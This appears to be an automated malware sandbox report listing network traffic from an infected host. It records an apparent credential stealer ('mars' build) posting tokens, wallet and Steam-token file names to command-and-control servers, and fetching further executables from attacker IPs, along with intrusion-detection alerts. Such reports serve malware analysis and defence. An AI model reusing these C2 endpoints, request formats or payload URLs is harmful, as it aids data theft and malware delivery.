22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="file"------CGDGCFBAEGDHJKEBGCBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIIDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 2d 2d 0d 0a Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="file"------HDGIEBGHDAEBGDGCFIID--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 2d 2d 0d 0a Data Ascii: ------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------GCAEHDBAAECBFHJKFCFBContent-Disposition: form-data; name="message"wallets------GCAEHDBAAECBFHJKFCFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="message"files------DHCBAEHJJJKKFIDGHJEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 2d 2d 0d 0a Data Ascii: ------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KKFHJJDHJEGHJKECBGCFContent-Disposition: form-data; name="file"------KKFHJJDHJEGHJKECBGCF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"ybncbhylepme------EGDAEBGIDBGHIECBGHJD--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 38 66 39 36 37 38 65 32 66 37 66 64 39 30 61 66 65 32 61 31 33 31 39 35 32 37 39 63 31 61 63 37 62 38 62 62 37 61 37 31 37 30 35 36 65 30 66 34 62 61 36 63 66 32 36 65 38 61 30 34 31 65 30 35 32 31 39 32 62 38 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"d8f9678e2f7fd90afe2a13195279c1ac7b8bb7a717056e0f4ba6cf26e8a041e052192b80------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 42 37 39 42 39 35 42 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2B79B95B82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /test2.exe HTTP/1.1Host: mncrafter.ru
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 34 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005413001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 34 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005414001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 34 31 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005415001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"mars------CBGCAFIIECBFIDHIJKFB--
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 10 Nov 2024 23:53:54 GMTIf-None-Match: "67314792-1c3200"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 34 31 36 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005416031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 34 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005417001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGDHCFCAAECAKECBAFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 44 48 43 46 43 41 41 45 43 41 4b 45 43 42 41 46 2d 2d 0d 0a Data Ascii: ------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------JKEGDHCFCAAECAKECBAFContent-Disposition: form-data; name="build"mars------JKEGDHCFCAAECAKECBAF--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 36 34 36 44 34 37 37 31 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 2d 2d 0d 0a Data Ascii: ------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="hwid"D2646D4771BC4158135236------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="build"mars------BKKFCFBKFCFBFIDGCGDH--

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49753 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49762 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49846 -> 87.236.16.19:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49876 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50011 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50021 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50022 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50028 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50047 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50050 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50053 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50051 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50054 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50055 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50056 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50057 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50059 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50061 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50063 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50064 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49763

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
